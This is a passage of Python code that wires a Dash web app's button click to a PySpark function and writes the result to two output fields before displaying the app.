            dcc.Markdown(children=sample_input_data)
        ])
    ])
])
    
@app.callback(
    [Output(component_id='output', component_property='value'),  # set output component on reactive change
    Output(component_id='coefs', component_property='value')],
    [Input(component_id='button', component_property='n_clicks')],  #  reactive input comes from button press
    [dash.dependencies.State('input', 'value')]
)
def on_click(n_clicks, value):
    # call pyspark logic from here
    return spark_code(value)
    

viewer.show(app)